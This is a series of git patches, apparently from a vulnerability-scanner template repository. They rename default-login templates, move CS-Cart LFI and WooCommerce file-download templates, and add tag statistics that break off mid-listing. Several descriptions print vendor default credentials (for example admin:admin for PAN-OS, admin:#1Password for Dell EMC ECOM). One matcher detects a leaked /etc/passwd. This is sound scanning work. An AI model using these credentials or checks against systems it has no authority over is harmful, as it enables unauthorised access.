name: Chinaunicom Modem Default Credentials + name: Chinaunicom Modem Default Login author: princechaddha severity: high tags: chinaunicom,default-login diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml index 5c46e83359..4680d52fe3 100644 --- a/default-logins/dell/emcecom-default-login.yaml +++ b/default-logins/dell/emcecom-default-login.yaml @@ -1,10 +1,10 @@ -id: dell-emc-ecom-default-credentials +id: dell-emc-ecom-default-login info: - name: Dell EMC ECOM Default Credentials + name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of admin:#1Password on Dell EMC ECOM application. + description: Default Login of admin:#1Password on Dell EMC ECOM application. reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation tags: dell,emc,ecom,default-login diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml index ce51b74bdd..01ea6a9026 100644 --- a/default-logins/druid/druid-default-login.yaml +++ b/default-logins/druid/druid-default-login.yaml @@ -1,7 +1,7 @@ id: druid-default-login info: - name: Druid Default Credentials + name: Druid Default Login author: pikpikcu severity: high tags: druid,default-login diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml index 996f7d3414..4cf084572e 100644 --- a/default-logins/dvwa/dvwa-default-login.yaml +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -1,6 +1,6 @@ id: dvwa-default-login info: - name: DVWA Default Credentials + name: DVWA Default Login author: pdteam severity: critical tags: dvwa,default-login diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml index e1b88734e1..3f1e2abe4a 100644 --- a/default-logins/exacqvision/exacqvision-default-login.yaml +++ b/default-logins/exacqvision/exacqvision-default-login.yaml @@ -1,7 +1,7 @@ id: exacqvision-default-login info: - name: ExacqVision Default Credentials + name: ExacqVision Default Login author: ELSFA7110 severity: high tags: exacqvision,default-login diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml index 244b3f7770..ae4bc0b20a 100644 --- a/default-logins/flir/flir-default-login.yaml +++ b/default-logins/flir/flir-default-login.yaml @@ -1,7 +1,7 @@ id: flir-default-login info: - name: Flir Default Credentials + name: Flir Default Login author: pikpikcu severity: medium tags: default-login,flir,camera,iot diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml index 605d43a20e..91915c07fb 100644 --- a/default-logins/frps/frp-default-login.yaml +++ b/default-logins/frps/frp-default-login.yaml @@ -1,7 +1,7 @@ -id: frp-default-credentials +id: frp-default-login info: - name: Frp Default credentials + name: Frp Default Login author: pikpikcu severity: high tags: frp,default-login diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml index a6682402cd..36069bddc3 100644 --- a/default-logins/glpi/glpi-default-login.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -1,6 +1,6 @@ id: glpi-default-login info: - name: GLPI Default Credentials + name: GLPI Default Login author: andysvints severity: high tags: glpi,default-login diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index fe8fde6b88..efea21f9ff 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -1,6 +1,6 @@ id: grafana-default-login info: - name: Grafana Default Credentials + name: Grafana Default Login author: pdteam severity: high tags: grafana,default-login diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml index 811d0daf45..e35338f606 100644 --- a/default-logins/guacamole/guacamole-default-login.yaml +++ b/default-logins/guacamole/guacamole-default-login.yaml @@ -1,7 +1,7 @@ -id: guacamole-default-credentials +id: guacamole-default-login info: - name: Guacamole Default Credentials + name: Guacamole Default Login author: r3dg33k severity: high tags: guacamole,default-login diff --git a/default-logins/hongdian/hongdian-default-login.yaml b/default-logins/hongdian/hongdian-default-login.yaml index f6098d34fa..03f0201cb4 100644 --- a/default-logins/hongdian/hongdian-default-login.yaml +++ b/default-logins/hongdian/hongdian-default-login.yaml @@ -1,7 +1,7 @@ id: hongdian-default-password info: - name: Hongdian Default Credentials + name: Hongdian Default Login author: gy741 severity: high tags: hongdian,default-login diff --git a/default-logins/hortonworks/smartsense-default-login.yaml b/default-logins/hortonworks/smartsense-default-login.yaml index f65959bb3b..a4593fc854 100644 --- a/default-logins/hortonworks/smartsense-default-login.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -1,10 +1,10 @@ id: smartsense-default-login info: - name: HortonWorks SmartSense Default Credentials + name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of admin:admin on HortonWorks SmartSense application. + description: Default Login of admin:admin on HortonWorks SmartSense application. reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html tags: hortonworks,smartsense,default-login diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 5355da56b9..21a47dde00 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -1,7 +1,7 @@ id: ibm-storage-default-login info: - name: IBM Storage Management Default Credentials + name: IBM Storage Management Default Login author: madrobot severity: medium tags: default-login,ibm diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 9387666a77..4721e74d28 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -1,10 +1,10 @@ id: idemia-biometrics-default-login info: - name: IDEMIA BIOMetrics Default Credentials + name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of password=12345 on IDEMIA BIOMetrics application. + description: Default Login of password=12345 on IDEMIA BIOMetrics application. reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index 2783440e0b..da94fcec13 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -1,7 +1,7 @@ id: iptime-default-login info: - name: ipTIME Default Credentials + name: ipTIME Default Login author: gy741 severity: high tags: iptime,default-login diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml index a715abd0f3..8fe40766bf 100644 --- a/default-logins/minio/minio-default-login.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -1,7 +1,7 @@ id: minio-default-login info: - name: Minio Default Credentials + name: Minio Default Login author: pikpikcu severity: medium tags: default-login,minio diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index fcb2f57abe..fcb25e0ee3 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -1,6 +1,6 @@ id: nagios-default-login info: - name: Nagios Default Credentials + name: Nagios Default Login author: iamthefrogy severity: high tags: nagios,default-login diff --git a/default-logins/nexus/nexus-default-login.yaml b/default-logins/nexus/nexus-default-login.yaml index 048122d052..187dd37286 100644 --- a/default-logins/nexus/nexus-default-login.yaml +++ b/default-logins/nexus/nexus-default-login.yaml @@ -1,7 +1,7 @@ id: nexus-default-login info: - name: Nexus Default Credentials + name: Nexus Default Login author: pikpikcu severity: high tags: nexus,default-login diff --git a/default-logins/nps/nps-default-login.yaml b/default-logins/nps/nps-default-login.yaml index cbad4c677a..329b5acb7e 100644 --- a/default-logins/nps/nps-default-login.yaml +++ b/default-logins/nps/nps-default-login.yaml @@ -1,7 +1,7 @@ id: nps-default-login info: - name: NPS Default Credentials + name: NPS Default Login author: pikpikcu severity: high tags: nps,default-login diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml index 449c67c5b2..6a10fbeed3 100644 --- a/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/default-logins/ofbiz/ofbiz-default-login.yaml @@ -1,7 +1,7 @@ -id: ofbiz-default-credentials +id: ofbiz-default-login info: - name: Apache OfBiz Default Credentials + name: Apache OfBiz Default Login author: pdteam severity: medium tags: ofbiz,default-login diff --git a/default-logins/oracle/businessintelligence-default-login.yaml b/default-logins/oracle/businessintelligence-default-login.yaml index 13706a3c30..0722fab2d9 100644 --- a/default-logins/oracle/businessintelligence-default-login.yaml +++ b/default-logins/oracle/businessintelligence-default-login.yaml @@ -1,7 +1,7 @@ id: oracle-business-intelligence-login info: - name: Oracle Business Intelligence Default Credentials + name: Oracle Business Intelligence Default Login author: milo2012 severity: high tags: oracle,default-login diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index 2a9e289e52..1631b3132e 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -1,10 +1,10 @@ id: panos-default-login info: - name: Palo Alto Networks PAN-OS Default Credentials + name: Palo Alto Networks PAN-OS Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application. + description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. tags: paloalto,panos,default-login diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index 3f390a5b8d..d69c44cc3f 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -1,7 +1,7 @@ id: panabit-default-login info: - name: Panabit Gateway Default Credentials + name: Panabit Gateway Default Login author: pikpikcu severity: high reference: https://max.book118.com/html/2017/0623/117514590.shtm diff --git a/default-logins/rabbitmq/rabbitmq-default-login.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml index 237a3d11e0..1f8dc9b5d7 100644 --- a/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -1,7 +1,7 @@ id: rabbitmq-default-login info: - name: RabbitMQ admin Default Credentials + name: RabbitMQ admin Default Login author: fyoorer,dwisiswant0 severity: high tags: rabbitmq,default-login diff --git a/default-logins/rockmongo/rockmongo-default-login.yaml b/default-logins/rockmongo/rockmongo-default-login.yaml index 5ef3fc4895..5a1bf55b42 100644 --- a/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/default-logins/rockmongo/rockmongo-default-login.yaml @@ -1,7 +1,7 @@ id: rockmongo-default-login info: - name: Rockmongo Default Credentials + name: Rockmongo Default Login author: pikpikcu severity: high tags: rockmongo,default-login diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index 5d39b7aced..bb29f3d888 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -1,7 +1,7 @@ id: samsung-wlan-default-login info: - name: Samsung Wlan AP (WEA453e) Default Credentials + name: Samsung Wlan AP (WEA453e) Default Login author: pikpikcu severity: high reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ diff --git a/default-logins/showdoc/showdoc-default-login.yaml b/default-logins/showdoc/showdoc-default-login.yaml index 1ef661333a..16b59aaf5d 100644 --- a/default-logins/showdoc/showdoc-default-login.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -1,7 +1,7 @@ id: showdoc-default-login info: - name: Showdoc Default Credentials + name: Showdoc Default Login author: pikpikcu severity: medium reference: diff --git a/default-logins/solarwinds/solarwinds-default-login.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml index 55d834c7b5..191e232c4b 100644 --- a/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/default-logins/solarwinds/solarwinds-default-login.yaml @@ -1,7 +1,7 @@ id: solarwinds-default-admin info: - name: SolarWinds Orion Default Credentials + name: SolarWinds Orion Default Login author: dwisiswant0 severity: high tags: solarwinds,default-login diff --git a/default-logins/spectracom/spectracom-default-login.yaml b/default-logins/spectracom/spectracom-default-login.yaml index d60d573373..401684b2fd 100644 --- a/default-logins/spectracom/spectracom-default-login.yaml +++ b/default-logins/spectracom/spectracom-default-login.yaml @@ -1,7 +1,7 @@ id: spectracom-default-login info: - name: Spectracom Default Credentials + name: Spectracom Default Login author: madrobot severity: medium tags: spectracom,default-login diff --git a/default-logins/szhe/szhe-default-login.yaml b/default-logins/szhe/szhe-default-login.yaml index 1eee03a541..ea60ca2694 100644 --- a/default-logins/szhe/szhe-default-login.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -1,7 +1,7 @@ id: szhe-default-login info: - name: Szhe Default Credentials + name: Szhe Default Login author: pikpikcu severity: low tags: szhe,default-login diff --git a/default-logins/vidyo/vidyo-default-login.yaml b/default-logins/vidyo/vidyo-default-login.yaml index 1c27bad550..12541056e9 100644 --- a/default-logins/vidyo/vidyo-default-login.yaml +++ b/default-logins/vidyo/vidyo-default-login.yaml @@ -1,7 +1,7 @@ -id: vidyo-default-credentials +id: vidyo-default-login info: - name: Vidyo Default Credentials + name: Vidyo Default Login author: izn0u severity: medium description: test for default cred super:password diff --git a/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/default-logins/viewpoint/trilithic-viewpoint-login.yaml index 0a09c29d59..49efa15a32 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -1,7 +1,7 @@ id: trilithic-viewpoint-default info: - name: Trilithic Viewpoint Default Credentials + name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high description: | diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index c4bb066e85..73b47bbc33 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml @@ -1,10 +1,10 @@ -id: visionhub-default-credentials +id: visionhub-default-login info: - name: VisionHub Default Credentials + name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of admin:admin on VisionHub application. + description: Default Login of admin:admin on VisionHub application. tags: visionhub,default-login reference: https://www.qognify.com/products/visionhub/ diff --git a/default-logins/wifisky/wifisky-default-login.yaml b/default-logins/wifisky/wifisky-default-login.yaml index 0f4f5453d3..260722f63c 100644 --- a/default-logins/wifisky/wifisky-default-login.yaml +++ b/default-logins/wifisky/wifisky-default-login.yaml @@ -1,7 +1,7 @@ id: wifisky-default-login info: - name: Wifisky Default Credentials + name: Wifisky Default Login author: pikpikcu severity: high tags: default-login,wifisky diff --git a/default-logins/wso2/wso2-default-login.yaml b/default-logins/wso2/wso2-default-login.yaml index 95d84ac92d..89b6bac30f 100644 --- a/default-logins/wso2/wso2-default-login.yaml +++ b/default-logins/wso2/wso2-default-login.yaml @@ -1,7 +1,7 @@ id: wso2-default-login info: - name: WSO2 Management Console Default Credentials + name: WSO2 Management Console Default Login author: cocxanh severity: high reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 9e2d865b65..daf9ed85be 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -1,7 +1,7 @@ id: xxljob-default-login info: - name: XXL-JOB Default Credentials + name: XXL-JOB Default Login author: pdteam severity: high tags: default-login,xxljob diff --git a/default-logins/zabbix/zabbix-default-login.yaml b/default-logins/zabbix/zabbix-default-login.yaml index da0f08e602..7f7c15adc4 100644 --- a/default-logins/zabbix/zabbix-default-login.yaml +++ b/default-logins/zabbix/zabbix-default-login.yaml @@ -1,7 +1,7 @@ -id: zabbix-default-credentials +id: zabbix-default-login info: - name: Zabbix Default Credentials + name: Zabbix Default Login author: pdteam severity: critical tags: zabbix,default-login diff --git a/default-logins/zmanda/zmanda-default-login.yaml b/default-logins/zmanda/zmanda-default-login.yaml index 5387e171f8..4bdc37d5c9 100644 --- a/default-logins/zmanda/zmanda-default-login.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -1,10 +1,10 @@ id: zmanda-default-login info: - name: Zmanda Default Credentials + name: Zmanda Default Login author: Techryptic (@Tech) severity: high - description: Default Credentials of admin:admin on Zmanda application. + description: Default Login of admin:admin on Zmanda application. reference: https://www.zmanda.com tags: zmanda,default-login From b335b6a6863e558eee5103c59567a42964377fef Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 16:09:21 +0530 Subject: [PATCH 2473/4083] more updates --- default-logins/axis2/axis2-default-login.yaml | 4 ++-- default-logins/hongdian/hongdian-default-login.yaml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/default-logins/axis2/axis2-default-login.yaml b/default-logins/axis2/axis2-default-login.yaml index 3b08bd2654..ac81168585 100644 --- a/default-logins/axis2/axis2-default-login.yaml +++ b/default-logins/axis2/axis2-default-login.yaml @@ -1,7 +1,7 @@ -id: axis2-default-password +id: axis2-default-login info: - name: Axis2 Default Password + name: Axis2 Default Login author: pikpikcu severity: high tags: axis,apache,default-login diff --git a/default-logins/hongdian/hongdian-default-login.yaml b/default-logins/hongdian/hongdian-default-login.yaml index 03f0201cb4..d7f574e5ad 100644 --- a/default-logins/hongdian/hongdian-default-login.yaml +++ b/default-logins/hongdian/hongdian-default-login.yaml @@ -1,4 +1,4 @@ -id: hongdian-default-password +id: hongdian-default-login info: name: Hongdian Default Login From a60e8a9d5e0126a6da7bb4f706beca5caac5ea6e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:08:32 +0530 Subject: [PATCH 2474/4083] misc update --- .../cs-cart-unauthenticated-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename cs-cart-unauthenticated-lfi.yaml => vulnerabilities/cs-cart-unauthenticated-lfi.yaml (94%) diff --git a/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/cs-cart-unauthenticated-lfi.yaml similarity index 94% rename from cs-cart-unauthenticated-lfi.yaml rename to vulnerabilities/cs-cart-unauthenticated-lfi.yaml index 1abb6807b8..f175d20028 100644 --- a/cs-cart-unauthenticated-lfi.yaml +++ b/vulnerabilities/cs-cart-unauthenticated-lfi.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" - type: status status: From 18142906f070803af564677c08e02d9fc30c8970 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:09:43 +0530 Subject: [PATCH 2475/4083] moving files around --- vulnerabilities/{ => other}/cs-cart-unauthenticated-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/{ => other}/cs-cart-unauthenticated-lfi.yaml (100%) diff --git a/vulnerabilities/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml similarity index 100% rename from vulnerabilities/cs-cart-unauthenticated-lfi.yaml rename to vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml From dfa85833e27ed12b3cf144675ac2fae6726f4334 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:18:21 +0530 Subject: [PATCH 2476/4083] misc update --- .../wordpress/wp-woocommerce-file-download.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename product-input-fields-for-woocommerce-file-download.yaml => vulnerabilities/wordpress/wp-woocommerce-file-download.yaml (100%) diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml similarity index 100% rename from product-input-fields-for-woocommerce-file-download.yaml rename to vulnerabilities/wordpress/wp-woocommerce-file-download.yaml From a898a6c3a646bd2a2830996ba94dad569bef2f10 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 18:19:25 +0530 Subject: [PATCH 2477/4083] Update wp-woocommerce-file-download.yaml --- vulnerabilities/wordpress/wp-woocommerce-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 5c4de213ce..13aeedf332 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -1,4 +1,4 @@ -id: product-input-fields-for-woocommerce-file-download +id: wp-woocommerce-file-download info: name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download From be5d4abcf18d2e76519310a82a60e53259b475fb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 Sep 2021 14:54:10 +0000 Subject: [PATCH 2478/4083] Auto Generated Templates Stats [Wed Sep 22 14:54:10 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1555 +++++++++++++++++++++--------------------- TOP-10.md | 12 +- 3 files changed, 786 insertions(+), 783 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index b20b347a30..991eabbc05 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":724},{"name":"lfi","count":258},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":222},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":126},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":46},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"oracle","count":36},{"name":"","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":23},{"name":"misc","count":23},{"name":"disclosure","count":21},{"name":"auth-bypass","count":20},{"name":"generic","count":20},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"weblogic","count":14},{"name":"cve2011","count":14},{"name":"fuzz","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"dns","count":13},{"name":"devops","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"nginx","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"netgear","count":7},{"name":"google","count":7},{"name":"vmware","count":7},{"name":"kubernetes","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"cve2009","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"backup","count":7},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":5},{"name":"deserialization","count":5},{"name":"lucee","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"dedecms","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"fileupload","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"headless","count":5},{"name":"ssti","count":5},{"name":"iis","count":5},{"name":"thinkphp","count":4},{"name":"buffalo","count":4},{"name":"exchange","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"proxy","count":4},{"name":"glpi","count":4},{"name":"firmware","count":4},{"name":"solarwinds","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"strapi","count":4},{"name":"symfony","count":4},{"name":"symantec","count":4},{"name":"crlf","count":4},{"name":"zabbix","count":4},{"name":"hp","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"git","count":4},{"name":"prometheus","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"camera","count":3},{"name":"ofbiz","count":3},{"name":"firebase","count":3},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"zhiyuan","count":3},{"name":"ebs","count":3},{"name":"springcloud","count":3},{"name":"tikiwiki","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"jellyfin","count":3},{"name":"druid","count":3},{"name":"bigip","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"hoteldruid","count":3},{"name":"fanruan","count":3},{"name":"mail","count":3},{"name":"httpd","count":3},{"name":"itop","count":3},{"name":"openam","count":3},{"name":"targa","count":3},{"name":"nosqli","count":3},{"name":"amazon","count":3},{"name":"fpd","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"cacti","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"mongodb","count":3},{"name":"kevinlab","count":3},{"name":"npm","count":3},{"name":"caucho","count":3},{"name":"linkerd","count":3},{"name":"nacos","count":3},{"name":"telerik","count":3},{"name":"slack","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"oa","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"rstudio","count":2},{"name":"spark","count":2},{"name":"akkadian","count":2},{"name":"cve2007","count":2},{"name":"yapi","count":2},{"name":"globalprotect","count":2},{"name":"avantfax","count":2},{"name":"showdoc","count":2},{"name":"natshell","count":2},{"name":"liferay","count":2},{"name":"ucmdb","count":2},{"name":"minio","count":2},{"name":"rockmongo","count":2},{"name":"mida","count":2},{"name":"paloalto","count":2},{"name":"hashicorp","count":2},{"name":"leak","count":2},{"name":"sitecore","count":2},{"name":"activemq","count":2},{"name":"azure","count":2},{"name":"saltstack","count":2},{"name":"chamilo","count":2},{"name":"axis2","count":2},{"name":"kong","count":2},{"name":"bucket","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"netis","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"geowebserver","count":2},{"name":"fortios","count":2},{"name":"vrealize","count":2},{"name":"horde","count":2},{"name":"plesk","count":2},{"name":"jsf","count":2},{"name":"totemomail","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"service","count":2},{"name":"cache","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"ecology","count":2},{"name":"chiyu","count":2},{"name":"wuzhicms","count":2},{"name":"sonicwall","count":2},{"name":"seeyon","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"status","count":2},{"name":"frp","count":2},{"name":"cve2005","count":2},{"name":"sharepoint","count":2},{"name":"smb","count":2},{"name":"axis","count":2},{"name":"akamai","count":2},{"name":"nextjs","count":2},{"name":"wordfence","count":2},{"name":"linux","count":2},{"name":"shellshock","count":2},{"name":"getsimple","count":2},{"name":"ilo","count":2},{"name":"favicon","count":2},{"name":"emerge","count":2},{"name":"harbor","count":2},{"name":"prestashop","count":2},{"name":"odoo","count":2},{"name":"huawei","count":2},{"name":"guacamole","count":2},{"name":"github","count":2},{"name":"hasura","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"qcubed","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"keycloak","count":2},{"name":"dolibarr","count":2},{"name":"netsweeper","count":2},{"name":"ec2","count":2},{"name":"icewarp","count":2},{"name":"storage","count":2},{"name":"voipmonitor","count":2},{"name":"phpcollab","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"db","count":2},{"name":"mcafee","count":2},{"name":"igs","count":2},{"name":"prtg","count":2},{"name":"hjtcloud","count":2},{"name":"sonarqube","count":2},{"name":"manageengine","count":2},{"name":"backdoor","count":2},{"name":"hpe","count":2},{"name":"dos","count":2},{"name":"aruba","count":2},{"name":"openfire","count":2},{"name":"adminer","count":2},{"name":"yii","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"jeedom","count":2},{"name":"hostheader-injection","count":2},{"name":"node","count":2},{"name":"bruteforce","count":2},{"name":"faraday","count":1},{"name":"tracer","count":1},{"name":"h3c-imc","count":1},{"name":"nette","count":1},{"name":"commscope","count":1},{"name":"nordex","count":1},{"name":"plugin","count":1},{"name":"hiawatha","count":1},{"name":"k8","count":1},{"name":"bedita","count":1},{"name":"kafdrop","count":1},{"name":"fiori","count":1},{"name":"